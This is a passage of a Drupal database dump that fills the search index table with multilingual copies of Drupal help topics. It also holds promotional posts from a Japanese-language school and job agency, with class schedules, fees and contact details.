(57, 'ja', 'help_search', ' creating a menu goal create a new menu steps in the manage administration menu navigate structure  menus click add menu  enter the title for the menu which is used as the default block title if the menu is displayed as a block if desired also edit the machine name of the menu which is by default derived from the title enter an administrative summary which is displayed on the menus page if your site has more than one language choose the language for the menu click save  you will be on the menu editing page ready to add links to the menu if the core custom menu links module is installed see related topics for further tasks  ', 1787923659),
(57, 'ko', 'help_search', ' creating a menu goal create a new menu steps in the manage administration menu navigate structure  menus click add menu  enter the title for the menu which is used as the default block title if the menu is displayed as a block if desired also edit the machine name of the menu which is by default derived from the title enter an administrative summary which is displayed on the menus page if your site has more than one language choose the language for the menu click save  you will be on the menu editing page ready to add links to the menu if the core custom menu links module is installed see related topics for further tasks  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(58, 'en', 'help_search', ' reordering and disabling menu links goal disable menu links or change the order and hierarchy of menu links steps in the manage administration menu navigate to structure  menus click edit menu for the menu that you want to edit drag menu links into a new order or check uncheck enabled to enable or disable menu links click save to save your changes  ', 1787923659),
(58, 'ja', 'help_search', ' reordering and disabling menu links goal disable menu links or change the order and hierarchy of menu links steps in the manage administration menu navigate to structure  menus click edit menu for the menu that you want to edit drag menu links into a new order or check uncheck enabled to enable or disable menu links click save to save your changes  ', 1787923659),
(58, 'ko', 'help_search', ' reordering and disabling menu links goal disable menu links or change the order and hierarchy of menu links steps in the manage administration menu navigate to structure  menus click edit menu for the menu that you want to edit drag menu links into a new order or check uncheck enabled to enable or disable menu links click save to save your changes  ', 1787923659),
(59, 'en', 'help_search', ' creating a content item goal create and publish a content item see managing content for more about content types and content items who can create content  users with the access the content overview page permission can visit the content page as described in this topic each content type has its own create permissions for example to create content of type article a user would need the article create new content permission in addition users with the bypass content access control or administer content permission can create content items of all types some contributed modules change the permission structure for creating content steps in the manage administrative menu navigate to content  click add content  if there is more than one content type defined on your site that you have permission to create click the name of the type of content you want to create on the content edit form enter the title of your content which will show as the page title when the content item is displayed on a page and also as the label for the content item in administration screens fill in the other fields shown on the edit form for this specific content type leave the published field checked to publish the content immediately or uncheck it to make it unpublished unpublished content is generally not shown to nonadministrative site users optionally click preview to preview the content click save  you will see the content displayed on a page additional resources basic page management drupal user guide  creating a content item drupal user guide  ', 1787923659),
(59, 'ja', 'help_search', ' creating a content item goal create and publish a content item see managing content for more about content types and content items who can create content  users with the access the content overview page permission can visit the content page as described in this topic each content type has its own create permissions for example to create content of type article a user would need the article create new content permission in addition users with the bypass content access control or administer content permission can create content items of all types some contributed modules change the permission structure for creating content steps in the manage administrative menu navigate to content  click add content  if there is more than one content type defined on your site that you have permission to create click the name of the type of content you want to create on the content edit form enter the title of your content which will show as the page title when the content item is displayed on a page and also as the label for the content item in administration screens fill in the other fields shown on the edit form for this specific content type leave the published field checked to publish the content immediately or uncheck it to make it unpublished unpublished content is generally not shown to nonadministrative site users optionally click preview to preview the content click save  you will see the content displayed on a page additional resources basic page management drupal user guide  creating a content item drupal user guide  ', 1787923659),
(59, 'ko', 'help_search', ' creating a content item goal create and publish a content item see managing content for more about content types and content items who can create content  users with the access the content overview page permission can visit the content page as described in this topic each content type has its own create permissions for example to create content of type article a user would need the article create new content permission in addition users with the bypass content access control or administer content permission can create content items of all types some contributed modules change the permission structure for creating content steps in the manage administrative menu navigate to content  click add content  if there is more than one content type defined on your site that you have permission to create click the name of the type of content you want to create on the content edit form enter the title of your content which will show as the page title when the content item is displayed on a page and also as the label for the content item in administration screens fill in the other fields shown on the edit form for this specific content type leave the published field checked to publish the content immediately or uncheck it to make it unpublished unpublished content is generally not shown to nonadministrative site users optionally click preview to preview the content click save  you will see the content displayed on a page additional resources basic page management drupal user guide  creating a content item drupal user guide  ', 1787923659),
(60, 'en', 'help_search', ' creating a content type goal create a new content type see managing content for more about content types who can create a content type  users with the administer content types permission typically administrators can create new content types steps in the manage administrative menu navigate to structure   content types  click add content type in the name field enter a name for the content type which is how it will be listed in the administrative interface optionally enter a description for the content type you may also want to adjust some of the settings in the vertical tabs section of the edit page click save and manage fields  your content type will be created and assuming you have the core field ui module installed you will be taken to the manage fields page for the content type if you do not have the core field ui module installed the button will say save instead if you have the core field ui module installed follow the steps in the related topics to add fields to the new content type set up the editing form and configure the display additional resources adding a content type drupal user guide  setting up content structure drupal user guide  ', 1787923659),
(60, 'ja', 'help_search', ' creating a content type goal create a new content type see managing content for more about content types who can create a content type  users with the administer content types permission typically administrators can create new content types steps in the manage administrative menu navigate to structure   content types  click add content type in the name field enter a name for the content type which is how it will be listed in the administrative interface optionally enter a description for the content type you may also want to adjust some of the settings in the vertical tabs section of the edit page click save and manage fields  your content type will be created and assuming you have the core field ui module installed you will be taken to the manage fields page for the content type if you do not have the core field ui module installed the button will say save instead if you have the core field ui module installed follow the steps in the related topics to add fields to the new content type set up the editing form and configure the display additional resources adding a content type drupal user guide  setting up content structure drupal user guide  ', 1787923659),
(60, 'ko', 'help_search', ' creating a content type goal create a new content type see managing content for more about content types who can create a content type  users with the administer content types permission typically administrators can create new content types steps in the manage administrative menu navigate to structure   content types  click add content type in the name field enter a name for the content type which is how it will be listed in the administrative interface optionally enter a description for the content type you may also want to adjust some of the settings in the vertical tabs section of the edit page click save and manage fields  your content type will be created and assuming you have the core field ui module installed you will be taken to the manage fields page for the content type if you do not have the core field ui module installed the button will say save instead if you have the core field ui module installed follow the steps in the related topics to add fields to the new content type set up the editing form and configure the display additional resources adding a content type drupal user guide  setting up content structure drupal user guide  ', 1787923659),
(61, 'en', 'help_search', ' editing a content item goal find a content item and edit it or update a group of content items in bulk see managing content for more about content types and content items who can find and edit content  users with the access the content overview page permission can use the content page to find content each content type has its own edit permissions for example to edit content of type article a user would need the article edit own content permission to edit an article they created or the article edit any content permission to edit an article someone else created in addition users with the bypass content access control or administer content permission can edit content items of all types some contributed modules change the permission structure for editing content steps in the manage administrative menu navigate to content  optionally use filters to reduce the list of content items shown  title  key word s from the title content type published status language if you enter or select filter values click filter to apply the filters optionally sort the list by clicking a column header click again to reverse the order to edit the title or other field values for one content item click edit in the row of the content item update the values and click save  a few types of edits can be done in bulk to multiple content items for example to publish several unpublished content items check the boxes in the left column right column in righttoleft languages to select the desired content items for action  select the publish content action click apply to selected items to make the change the other actions under action work in a similar manner additional resources basic page management drupal user guide  editing a content item drupal user guide  ', 1787923659),
(61, 'ja', 'help_search', ' editing a content item goal find a content item and edit it or update a group of content items in bulk see managing content for more about content types and content items who can find and edit content  users with the access the content overview page permission can use the content page to find content each content type has its own edit permissions for example to edit content of type article a user would need the article edit own content permission to edit an article they created or the article edit any content permission to edit an article someone else created in addition users with the bypass content access control or administer content permission can edit content items of all types some contributed modules change the permission structure for editing content steps in the manage administrative menu navigate to content  optionally use filters to reduce the list of content items shown  title  key word s from the title content type published status language if you enter or select filter values click filter to apply the filters optionally sort the list by clicking a column header click again to reverse the order to edit the title or other field values for one content item click edit in the row of the content item update the values and click save  a few types of edits can be done in bulk to multiple content items for example to publish several unpublished content items check the boxes in the left column right column in righttoleft languages to select the desired content items for action  select the publish content action click apply to selected items to make the change the other actions under action work in a similar manner additional resources basic page management drupal user guide  editing a content item drupal user guide  ', 1787923659),
(61, 'ko', 'help_search', ' editing a content item goal find a content item and edit it or update a group of content items in bulk see managing content for more about content types and content items who can find and edit content  users with the access the content overview page permission can use the content page to find content each content type has its own edit permissions for example to edit content of type article a user would need the article edit own content permission to edit an article they created or the article edit any content permission to edit an article someone else created in addition users with the bypass content access control or administer content permission can edit content items of all types some contributed modules change the permission structure for editing content steps in the manage administrative menu navigate to content  optionally use filters to reduce the list of content items shown  title  key word s from the title content type published status language if you enter or select filter values click filter to apply the filters optionally sort the list by clicking a column header click again to reverse the order to edit the title or other field values for one content item click edit in the row of the content item update the values and click save  a few types of edits can be done in bulk to multiple content items for example to publish several unpublished content items check the boxes in the left column right column in righttoleft languages to select the desired content items for action  select the publish content action click apply to selected items to make the change the other actions under action work in a similar manner additional resources basic page management drupal user guide  editing a content item drupal user guide  ', 1787923659),
(62, 'en', 'help_search', ' managing content what is a content item  a content item is a type of content entity for pagelevel content which can have fields that store text html markup images attached files and other data see managing content structure for more about content entities and fields what is a content type  content items are divided into content types  which are the entity subtypes for the content item entity type each content type has its own fields and display settings for example you might set up content types for pages articles recipes events and blog entries on your web site overview of managing content the core node module allows you to define content types and add and edit content items the core field ui module allows you to attach fields to each content type and manage the edit form and display for each content type see the related topics listed below for specific tasks many other core and contributed modules and installation profiles provide predefined content types modify the permission structure for content items and provide other functionality  ', 1787923659),
(62, 'en', 'node_search', ' starting from september 18th 2023 seize the opportunity to enroll in our exclusive jlpt n4 and n3 classes starting from september 18th 2023 seize the opportunity to enroll in our exclusive jlpt n4 and n3 classes admin fri 8252023 1200 starting from september 18th 2023 seize the opportunity to enroll in our exclusive jlpt n4 and n3 classes fri 8252023 943 starting from september 18th 2023 seize the opportunity to enroll in our exclusive jlpt n4 and n3 classes whether you re a beginner or looking to refine your language finesse our tailored courses have got you covered join hands with the renowned aye pa pa tun sensei a distinguished phd graduate from niigata university in japan with four years of dedicated expertise sensei brings a wealth of knowledge and experience to your language learning journey what awaits you comprehensive learning unparalleled growth sharpen your listening skills master reading comprehension polish your grammar expand your vocabulary conquer complex kanji characters partnering with new comet trading agency co ltd hit language center not only empowers your language journey but also offers invaluable assistance for training visas tokutei visas and student visas upon completion of courses you ll earn certificates that stand as a testament to your achievement dive into n4 and n3 class details n4 class  starting september 18 2023 schedule monday tuesday wednesday 3 months time 130 pm 330 pm fee 200000 mmk excluding textbook fee course materials minna no nihongo kanji nihongo challenge speed master dokkai speed master choukai nihongo no rokushiken jlpt old question n3 class  starting september 18 2023 schedule monday tuesday wednesday 3 months time 330 pm 530 pm fee 250000 mmk excluding textbook fee course materials soumatome kanji shinkensen master dokkai shinkensen master choukai shinkensen master bunpou n3 tango 2000 and goukaku dekiru n3 old question don t miss this golden opportunity to embrace the language of culture business and growth join the hit language center family and unlock a world of possibilities enroll today and let language mastery open doors to your future success phone 1 839330 1 8393344 1 8393393 9 775556677 viber 959 5556677 email  newcometagency gmailcom  website wwwnewcomettradingagencycom  ', 0),
(62, 'ja', 'help_search', ' managing content what is a content item  a content item is a type of content entity for pagelevel content which can have fields that store text html markup images attached files and other data see managing content structure for more about content entities and fields what is a content type  content items are divided into content types  which are the entity subtypes for the content item entity type each content type has its own fields and display settings for example you might set up content types for pages articles recipes events and blog entries on your web site overview of managing content the core node module allows you to define content types and add and edit content items the core field ui module allows you to attach fields to each content type and manage the edit form and display for each content type see the related topics listed below for specific tasks many other core and contributed modules and installation profiles provide predefined content types modify the permission structure for content items and provide other functionality  ', 1787923659),
(62, 'ja', 'node_search', ' 2023 年 1 月 18 日から 独占的 占的な jlpt n4 および n3 クラス ラスの スの受 の受講 受講の 講のチ のチャ チャン ャンス ンスを スを掴 を掴ん 掴んで んでく でくだ くださ ださい 初心者 心者で 者でも 語学の 学の磨 の磨き 磨きを きをか をかけ かけた けたい たい方 い方で 方でも 私たち たちの ちのカ のカス カスタ スタマ タマイ マイズ イズさ ズされ された れたコ たコー コース ースが スがお がお手 お手伝 手伝い 伝いし いしま します  2023 年 1 月 18 日から 独占的 占的な jlpt n4 および n3 クラス ラスの スの受 の受講 受講の 講のチ のチャ チャン ャンス ンスを スを掴 を掴ん 掴んで んでく でくだ くださ ださい 初心者 心者で 者でも 語学の 学の磨 の磨き 磨きを きをか をかけ かけた けたい たい方 い方で 方でも 私たち たちの ちのカ のカス カスタ スタマ タマイ マイズ イズさ ズされ された れたコ たコー コース ースが スがお がお手 お手伝 手伝い 伝いし いしま します admin fri 8252023 1142 2023 年 1 月 18 日から 独占的 占的な jlpt n4 および n3 クラス ラスの スの受 の受講 受講の 講のチ のチャ チャン ャンス ンスを スを掴 を掴ん 掴んで んでく でくだ くださ ださい 初心者 心者で 者でも 語学の 学の磨 の磨き 磨きを きをか をかけ かけた けたい たい方 い方で 方でも 私たち たちの ちのカ のカス カスタ スタマ タマイ マイズ イズさ ズされ された れたコ たコー コース ースが スがお がお手 お手伝 手伝い 伝いし いしま します fri 8252023 943 2023 年 1 月 18 日から 独占的 占的な jlpt n4 および n3 クラス ラスの スの受 の受講 受講の 講のチ のチャ チャン ャンス ンスを スを掴 を掴ん 掴んで んでく でくだ くださ ださい 初心者 心者で 者でも 語学の 学の磨 の磨き 磨きを きをか をかけ かけた けたい たい方 い方で 方でも 私たち たちの ちのカ のカス カスタ スタマ タマイ マイズ イズさ ズされ された れたコ たコー コース ースが スがお がお手 お手伝 手伝い 伝いし いしま します 日本の 本の新 の新潟 新潟大 潟大学 大学を 学を卒 を卒業 卒業し 業した した名 た名だ 名だた だたる aye pa pa tun 先生と 生と手 と手を 手を取 を取り 取り合 り合い 合いま いまし ましょ しょう 4 年間の 間の専 の専門 専門知 門知識 知識と 識と経 と経験 経験を 験を提 を提供 提供す 供する する先 る先生 先生が あなた なたの たの言 の言語 言語学 語学習 学習の 習の旅 の旅を 旅をサ をサポ サポー ポート ートし トしま します あなた なたを たを待 を待つ 待つも つもの 包括的 括的な 的な学 な学習 比類な 類なき なき成 き成長 聴解力 解力を 力を磨 を磨く 読解力 解力を 力をマ をマス マスタ スター ターす ーする 文法を 法を磨 を磨く 語彙を 彙を拡 を拡張 拡張す 張する 複雑な 雑な漢 な漢字 漢字を 字を克 を克服 克服す 服する new comet trading agency 株式会 式会社 会社と 社と提 と提携 提携し hit 言語セ 語セン センタ ンター ターは ーは言 は言語 言語学 語学習 学習の 習のサ のサポ サポー ポート ートだ トだけ だけで けでな でなく トレー レーニ ーニン ニング ングビ グビザ 特定技 定技能 技能ビ 能ビザ 学生ビ 生ビザ ビザの ザの貴 の貴重 貴重な 重な支 な支援 支援を 援を提 を提供 提供し 供しま します コース ース修 ス修了 修了時 了時に 時には あなた なたの たの成 の成果 成果を 果を証 を証明 証明す 明する する証 る証明 証明書 明書が 書が授 が授与 授与さ 与され されま れます  n4 および n3 クラス ラスの スの詳 の詳細 詳細を 細を確 を確認  n4 クラス   開始日 2023 年 9 月 18 日 スケジ ケジュ ジュー ュール 月曜日 火曜日 水曜日 3 ヶ月 時間 午後 1 時 30 分から から午 ら午後 3 時 30 分 料金 200000 mmk 教科書 科書料 書料金 料金を 金を除 を除く コース ース教 ス教材 みんな んなの なの日 の日本 日本語 漢字日 字日本 日本語 本語チ 語チャ チャレ ャレン レンジ スピー ピード ードマ ドマス マスタ スター ター読 ー読解 スピー ピード ードマ ドマス マスタ スター ター聴 ー聴解 日本語 本語能 語能力 能力試 力試験 jlpt old questions  n3 クラス   開始日 2023 年 9 月 18 日 スケジ ケジュ ジュー ュール 月曜日 火曜日 水曜日 3 ヶ月 時間 午後 3 時 30 分から から午 ら午後 5 時 30 分 料金 250000 mmk 教科書 科書料 書料金 料金を 金を除 を除く コース ース教 ス教材 総まと まとめ とめ漢 め漢字 新総合 総合マ 合マス マスタ スター ター読 ー読解 新総合 総合マ 合マス マスタ スター ター聴 ー聴解 新総合 総合マ 合マス マスタ スター ター文 ー文法 n3 単語 2000 合格で 格でき できる n3 旧問題 問題な 題など 文化 ビジネ ジネス 成長の 長の言 の言葉 言葉を 葉を抱 を抱き 抱きし きしめ しめる めるこ るこの この黄 の黄金 黄金の 金の機 の機会 機会を 会をお をお見 お見逃 見逃し 逃しな しなく hit 言語セ 語セン センタ ンター ターの ーのフ のファ ファミ ァミリ ミリー リーに ーに参 に参加 参加し 可能性 能性の 性の世 の世界 世界を 界を開 を開い 開いて いてく てくだ くださ ださい 今すぐ すぐ登 ぐ登録 登録し 言語の 語の達 の達成 達成に 成に向 に向け 向けた けた扉 た扉を 扉を開 を開け 開けま けまし ましょ しょう phone 1 839330 1 8393344 1 8393393 9 775556677 viber 959 5556677 email newcometagency gmailcom website wwwnewcomettradingagencycom  ', 0),
(62, 'ko', 'help_search', ' managing content what is a content item  a content item is a type of content entity for pagelevel content which can have fields that store text html markup images attached files and other data see managing content structure for more about content entities and fields what is a content type  content items are divided into content types  which are the entity subtypes for the content item entity type each content type has its own fields and display settings for example you might set up content types for pages articles recipes events and blog entries on your web site overview of managing content the core node module allows you to define content types and add and edit content items the core field ui module allows you to attach fields to each content type and manage the edit form and display for each content type see the related topics listed below for specific tasks many other core and contributed modules and installation profiles provide predefined content types modify the permission structure for content items and provide other functionality  ', 1787923659),
(63, 'en', 'help_search', ' creating a url alias for a content item goal give a content item page a human or seofriendly url alias you can follow similar steps to create an alias for a taxonomy term page see configuring aliases for urls for more about aliases who can create url aliases  users with the create and edit url aliases permission can create aliases to follow the steps in this topic you will also need permission to edit the content item steps locate and open the content edit form for the content item or create a new content item see related topics on creating and editing content under url alias on the edit form enter the desired alias for example aboutus make sure the alias starts with a character click save  verify that the page can be visited with the new alias for example https examplecom aboutus  additional resources creating a content item drupal user guide  ', 1787923659),
(63, 'ja', 'help_search', ' creating a url alias for a content item goal give a content item page a human or seofriendly url alias you can follow similar steps to create an alias for a taxonomy term page see configuring aliases for urls for more about aliases who can create url aliases  users with the create and edit url aliases permission can create aliases to follow the steps in this topic you will also need permission to edit the content item steps locate and open the content edit form for the content item or create a new content item see related topics on creating and editing content under url alias on the edit form enter the desired alias for example aboutus make sure the alias starts with a character click save  verify that the page can be visited with the new alias for example https examplecom aboutus  additional resources creating a content item drupal user guide  ', 1787923659),
(63, 'ko', 'help_search', ' creating a url alias for a content item goal give a content item page a human or seofriendly url alias you can follow similar steps to create an alias for a taxonomy term page see configuring aliases for urls for more about aliases who can create url aliases  users with the create and edit url aliases permission can create aliases to follow the steps in this topic you will also need permission to edit the content item steps locate and open the content edit form for the content item or create a new content item see related topics on creating and editing content under url alias on the edit form enter the desired alias for example aboutus make sure the alias starts with a character click save  verify that the page can be visited with the new alias for example https examplecom aboutus  additional resources creating a content item drupal user guide  ', 1787923659),
(64, 'en', 'help_search', ' editing a url alias goal change an existing url alias to correct the path or the alias value see configuring aliases for urls for more about aliases who can manage url aliases  users with the administer url aliases permission can edit aliases steps in the manage administration menu navigate to configuration   search and metadata   url aliases  a list of all the site s aliases will appear click edit in the dropdown button for the alias that you would like to change make the required changes and click save  you will be returned to the url alias list page note that you can also add new aliases from this page for any path on your site  ', 1787923659),
(64, 'ja', 'help_search', ' editing a url alias goal change an existing url alias to correct the path or the alias value see configuring aliases for urls for more about aliases who can manage url aliases  users with the administer url aliases permission can edit aliases steps in the manage administration menu navigate to configuration   search and metadata   url aliases  a list of all the site s aliases will appear click edit in the dropdown button for the alias that you would like to change make the required changes and click save  you will be returned to the url alias list page note that you can also add new aliases from this page for any path on your site  ', 1787923659),
(64, 'ko', 'help_search', ' editing a url alias goal change an existing url alias to correct the path or the alias value see configuring aliases for urls for more about aliases who can manage url aliases  users with the administer url aliases permission can edit aliases steps in the manage administration menu navigate to configuration   search and metadata   url aliases  a list of all the site s aliases will appear click edit in the dropdown button for the alias that you would like to change make the required changes and click save  you will be returned to the url alias list page note that you can also add new aliases from this page for any path on your site  ', 1787923659),
(65, 'en', 'help_search', ' configuring aliases for urls what is a url  url is the abbreviation for uniform resource locator which is the page s address on the web it is the name by which a browser identifies a page to display in the example visit us at examplecom   https examplecom would be the url for the home page of your website users use urls to locate content on the web what is a path  a path is the unique last part of the url for a specific function or piece of content for example for a page whose full url is https examplecom node 7  the path is node 7  here are some examples of paths you might find in your site node 7 path to a particular content item taxonomy term 6 path to a taxonomy term page user 3 path to a user profile page what is an alias  the core software allows you to provide more understandable urls for pages on your site which are called aliases  for example if you have an about us page with the path node 7  you can set up an alias of about so that your visitors will see it as https wwwexamplecom about  overview of configuring paths aliases and urls the core path module provides the url aliasing functionality the contributed pathauto module allows you to configure automaticallygenerated url aliases for content items and other pages see the related topics listed below for specific tasks additional resources concept paths aliases and urls drupal user guide  ', 1787923659),
(65, 'ja', 'help_search', ' configuring aliases for urls what is a url  url is the abbreviation for uniform resource locator which is the page s address on the web it is the name by which a browser identifies a page to display in the example visit us at examplecom   https examplecom would be the url for the home page of your website users use urls to locate content on the web what is a path  a path is the unique last part of the url for a specific function or piece of content for example for a page whose full url is https examplecom node 7  the path is node 7  here are some examples of paths you might find in your site node 7 path to a particular content item taxonomy term 6 path to a taxonomy term page user 3 path to a user profile page what is an alias  the core software allows you to provide more understandable urls for pages on your site which are called aliases  for example if you have an about us page with the path node 7  you can set up an alias of about so that your visitors will see it as https wwwexamplecom about  overview of configuring paths aliases and urls the core path module provides the url aliasing functionality the contributed pathauto module allows you to configure automaticallygenerated url aliases for content items and other pages see the related topics listed below for specific tasks additional resources concept paths aliases and urls drupal user guide  ', 1787923659),
(65, 'ko', 'help_search', ' configuring aliases for urls what is a url  url is the abbreviation for uniform resource locator which is the page s address on the web it is the name by which a browser identifies a page to display in the example visit us at examplecom   https examplecom would be the url for the home page of your website users use urls to locate content on the web what is a path  a path is the unique last part of the url for a specific function or piece of content for example for a page whose full url is https examplecom node 7  the path is node 7  here are some examples of paths you might find in your site node 7 path to a particular content item taxonomy term 6 path to a taxonomy term page user 3 path to a user profile page what is an alias  the core software allows you to provide more understandable urls for pages on your site which are called aliases  for example if you have an about us page with the path node 7  you can set up an alias of about so that your visitors will see it as https wwwexamplecom about  overview of configuring paths aliases and urls the core path module provides the url aliasing functionality the contributed pathauto module allows you to configure automaticallygenerated url aliases for content items and other pages see the related topics listed below for specific tasks additional resources concept paths aliases and urls drupal user guide  ', 1787923659),
(66, 'en', 'help_search', ' configuring search pages goal configure one or more search pages steps in the manage administrative menu navigate to configuration   search and metadata   search pages  scroll down to the search pages section you will see a list of the alreadyconfigured search pages on your site to configure an existing search page click edit  or to add a new search page select the search page type and click add search page  enter the desired label name and url path for the search page for content search pages select the desired level of influence in ranking search results of the available content ranking factors click save  you will be returned to the search pages page verify that the correct search page is listed as default in the status column if not click set as default in the operations list for the correct search page optionally disable or delete any search pages that you do not want to have available on the site disabling is temporary while deleting is permanent follow the steps in managing the search index to make sure that the search index is updated  ', 1787923659),
(66, 'en', 'node_search', ' exciting news for japanese language enthusiasts  exciting news for japanese language enthusiasts admin tue 2062024 1431 tue 2062024 1113  exciting news for japanese language enthusiasts  dear language learners and enthusiasts for those eager to embark on a journey to learn japanese from the very basics we are thrilled to announce the launch of our outdoor courses starting this january  course highlights  perfect for individuals desiring a systematic approach to learning japanese in partnership with a licensed agency ensuring a reliable and authentic learning experience abundant job opportunities await those who seize this chance don t miss out on the possibilities  pricing  basic n5 class 180000 n4 exam practice class 200000 basic n5 n4 combo special price of 350000 when enrolled together course details  basic n5 class duration 3 months includes textbook and dress n4 class duration 3 months includes textbook and dress why choose new comet  comprehensive learning from n5 level and beyond future courses including tokutei and small restaurant classes are in the pipeline stay tuned for more exciting opportunities  enroll now and secure your spot  whether you are a beginner or looking to enhance your japanese language skills new comet is the place to be join us for a vibrant learning experience that goes beyond the classroom for further details and enrollment please visit our website or contact us directly let s embark on this languagelearning adventure together  ', 0),
(66, 'ja', 'help_search', ' configuring search pages goal configure one or more search pages steps in the manage administrative menu navigate to configuration   search and metadata   search pages  scroll down to the search pages section you will see a list of the alreadyconfigured search pages on your site to configure an existing search page click edit  or to add a new search page select the search page type and click add search page  enter the desired label name and url path for the search page for content search pages select the desired level of influence in ranking search results of the available content ranking factors click save  you will be returned to the search pages page verify that the correct search page is listed as default in the status column if not click set as default in the operations list for the correct search page optionally disable or delete any search pages that you do not want to have available on the site disabling is temporary while deleting is permanent follow the steps in managing the search index to make sure that the search index is updated  ', 1787923659),
(66, 'ko', 'help_search', ' configuring search pages goal configure one or more search pages steps in the manage administrative menu navigate to configuration   search and metadata   search pages  scroll down to the search pages section you will see a list of the alreadyconfigured search pages on your site to configure an existing search page click edit  or to add a new search page select the search page type and click add search page  enter the desired label name and url path for the search page for content search pages select the desired level of influence in ranking search results of the available content ranking factors click save  you will be returned to the search pages page verify that the correct search page is listed as default in the status column if not click set as default in the operations list for the correct search page optionally disable or delete any search pages that you do not want to have available on the site disabling is temporary while deleting is permanent follow the steps in managing the search index to make sure that the search index is updated  ', 1787923659),
(67, 'en', 'help_search', ' managing the search index goal manage the search index and make sure that the site is fully indexed for searching what is the search index  the content and help search types provided by the core software preindex their content and store the results in several database tables that are collectively called the search index  the process of indexing renders the content and breaks it up into words which can then be matched more efficiently with keyword queries when users perform searches search indexing happens during cron runs see running and configuring cron for more information about cron steps in the manage administrative menu navigate to configuration   search and metadata   search pages  under indexing throttle  select the number of items to index per cron run  a smaller number will make cron faster and reduce the possibility of timeout a larger number will make sure more of your site is indexed in fewer cron runs under default indexing settings  enter the desired minimum word length to index  words smaller than this length will be dropped from both keywords when searching and content when indexing if your site uses chinese japanese or korean languages optionally check simple cjk handling under default indexing settings to provide some support for these languages click save configuration  and you should be returned to the search pages page click reindex site if you have changed the indexing configuration or later on if you believe that the search index has been corrupted follow the steps in running and configuring cron to make sure a cron task has been configured after waiting for cron to run several times verify that the content has been fully indexed for searching the overall status is listed under indexing progress  and the status for each search page is shown in the indexing progress column of the search pages section  ', 1787923659),
(67, 'ja', 'help_search', ' managing the search index goal manage the search index and make sure that the site is fully indexed for searching what is the search index  the content and help search types provided by the core software preindex their content and store the results in several database tables that are collectively called the search index  the process of indexing renders the content and breaks it up into words which can then be matched more efficiently with keyword queries when users perform searches search indexing happens during cron runs see running and configuring cron for more information about cron steps in the manage administrative menu navigate to configuration   search and metadata   search pages  under indexing throttle  select the number of items to index per cron run  a smaller number will make cron faster and reduce the possibility of timeout a larger number will make sure more of your site is indexed in fewer cron runs under default indexing settings  enter the desired minimum word length to index  words smaller than this length will be dropped from both keywords when searching and content when indexing if your site uses chinese japanese or korean languages optionally check simple cjk handling under default indexing settings to provide some support for these languages click save configuration  and you should be returned to the search pages page click reindex site if you have changed the indexing configuration or later on if you believe that the search index has been corrupted follow the steps in running and configuring cron to make sure a cron task has been configured after waiting for cron to run several times verify that the content has been fully indexed for searching the overall status is listed under indexing progress  and the status for each search page is shown in the indexing progress column of the search pages section  ', 1787923659),
(67, 'ja', 'node_search', ' wishing everyone a happy new day  wishing everyone a happy new day admin tue 2062024 1526 tue 2062024 1114 wishing everyone a happy new day  at new comet agency we re committed to providing practical japanese language instruction to ensure that children who have successfully passed restaurant interviews in japan don t have to pretend they don t know japanese our experienced teachers have been conducting group work and roleplaying sessions in the kitchen guiding the children through handson learning experiences it brings us immense joy to witness the dedication and hard work of the children as they immerse themselves in learning  ', 0),
(67, 'ko', 'help_search', ' managing the search index goal manage the search index and make sure that the site is fully indexed for searching what is the search index  the content and help search types provided by the core software preindex their content and store the results in several database tables that are collectively called the search index  the process of indexing renders the content and breaks it up into words which can then be matched more efficiently with keyword queries when users perform searches search indexing happens during cron runs see running and configuring cron for more information about cron steps in the manage administrative menu navigate to configuration   search and metadata   search pages  under indexing throttle  select the number of items to index per cron run  a smaller number will make cron faster and reduce the possibility of timeout a larger number will make sure more of your site is indexed in fewer cron runs under default indexing settings  enter the desired minimum word length to index  words smaller than this length will be dropped from both keywords when searching and content when indexing if your site uses chinese japanese or korean languages optionally check simple cjk handling under default indexing settings to provide some support for these languages click save configuration  and you should be returned to the search pages page click reindex site if you have changed the indexing configuration or later on if you believe that the search index has been corrupted follow the steps in running and configuring cron to make sure a cron task has been configured after waiting for cron to run several times verify that the content has been fully indexed for searching the overall status is listed under indexing progress  and the status for each search page is shown in the indexing progress column of the search pages section  ', 1787923659),
(68, 'en', 'help_search', ' configuring site search what are search pages  the core search module organizes site search into pages  each page allows users to search a particular type of content with a particular configuration the configuration includes specifying a url that starts with search  a name for the page and additional options for some search page types when users visit the main search page see search  they will see the configured search pages that they have access to each search page has a search form on it and the page will display search results after the user enters keywords into the form and clicks the search button what modules provide site search  the core search module provides the ability to configure search pages search page types are provided by both core and contributed modules the core modules that provide search page types are the node module for searching content pages the user module for searching user profiles the help module for searching help topics as an alternative to the core search module s system of search pages you can use contributed modules to provide site search for example the apache solr and sphinx contributed modules use thirdparty technology to provide site search what are the limitations of the core search module  there are two main limitations of the core search module first it is not appropriate for very large sites if you have a large site look into other search technologies like apache solr second the node search page type only supports exact keyword matching which is not the behavior that most users will expect you can improve this by installing a languagespecific stemming module for your language such as porter stemmer for american english which makes it so that for example a search for the word walk would match pages containing the words walk walking and walked what are the search permissions  users with use search permission can use the search form block and search page this permission is required for any search configured in the core search module in addition to use search   view user information permission is needed for searching users in addition to use search   view published content permission is needed for searching content users with use advanced search permission can use more complex search filtering when performing content searches configuring site search overview in order to configure site search using the core search module you will need to configure one or more search pages you will also need to verify or alter permissions so that the desired user roles can search the site see managing user accounts and site visitors for more information about roles and permissions for content search you will also need to make sure that the search index is configured and that the site is fully indexed finally you may wish to place the search form block on pages of your site or add the search page to a navigation menu to give users easy access to search see the related topics listed below for specific tasks additional resources online documentation for the search module ', 1787923659),
(68, 'en', 'node_search', ' congratulations 2242024  congratulations 2242024 admin tue 6252024 1100 mon 4222024 900 congratulations  congratulations hnin wai wai nwe thida khine for departing to japan hokkaido city with food service restaurant job at 2242024  congratulations for two person entering japan hokkaido city with food service restaurant  ', 0);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
